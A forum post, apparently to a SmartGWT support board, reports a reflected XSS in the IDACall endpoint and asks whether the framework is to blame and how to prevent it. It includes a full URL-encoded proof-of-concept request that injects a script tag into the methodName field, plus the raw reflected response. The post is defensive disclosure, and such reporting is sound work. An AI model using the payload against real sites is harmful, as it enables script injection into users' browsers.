Hi,
I ran some vulnerability tests on our system since we are using the SmartGWT framework.
During the testing, we were able to inject a Reflected Cross-Site Scripting (XSS) payload in the IDACall endpoint.
To reproduce the issue, paste the URL below into a browser.
URL:
Inside _transaction, we injected the methodName value with: "test123</TEXTAREA ><script>alert(document.domain)</script>l123" and an alert showing document.domain will appear.
We also tested this using Burp Suite, and here’s the raw response :
[HTML]
<HTML>
<BODY ONLOAD='var results = document.formResults.results.value;null'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
//isc_RPCResponseStart-->[{data:"Attempt to execute RPC DMI Builtin 'test123</TEXTAREA ><script>alert(document.domain)</script>l123' DENIED by server.properties configuration. To enable this method, add it to the list of methods under RPCManager.enabledBuiltinMethods in server.properties",status:-1}]//isc_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>
[/HTML]
May I ask if this is a vulnerability issue came from SmartGWT framework?
Is there a recommended way to prevent?
Thank you.
I ran some vulnerability tests on our system since we are using the SmartGWT framework.
During the testing, we were able to inject a Reflected Cross-Site Scripting (XSS) payload in the IDACall endpoint.
To reproduce the issue, paste the URL below into a browser.
URL:
Code:
http://serverurl/administratortool/sc/IDACall?&isc_rpc=1&isc_tnum=300&_transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A//www.w3.org/2000/10/XMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E5%3C/transactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CappID%3Eisc_builtin%3C/appID%3E%3CclassName%3Ebuiltin%3C/className%3E%3CmethodName%3Etest123%26lt%3B/TEXTAREA+%26gt%3B%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B/script%26gt%3Bl123%3C/methodName%3E%3Cis_ISC_RPC_DMI+xsi%3Atype%3D%22xsd%3Aboolean%22%3Etrue%3C/is_ISC_RPC_DMI%3E%3C/elem%3E%3C/operations%3E%3Ccallback%3Etest123%3C/callback%3E%3C/transaction%3E&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0
We also tested this using Burp Suite, and here’s the raw response :
[HTML]
<HTML>
<BODY ONLOAD='var results = document.formResults.results.value;null'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
//isc_RPCResponseStart-->[{data:"Attempt to execute RPC DMI Builtin 'test123</TEXTAREA ><script>alert(document.domain)</script>l123' DENIED by server.properties configuration. To enable this method, add it to the list of methods under RPCManager.enabledBuiltinMethods in server.properties",status:-1}]//isc_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>
[/HTML]
May I ask if this is a vulnerability issue came from SmartGWT framework?
Is there a recommended way to prevent?
Thank you.
Comment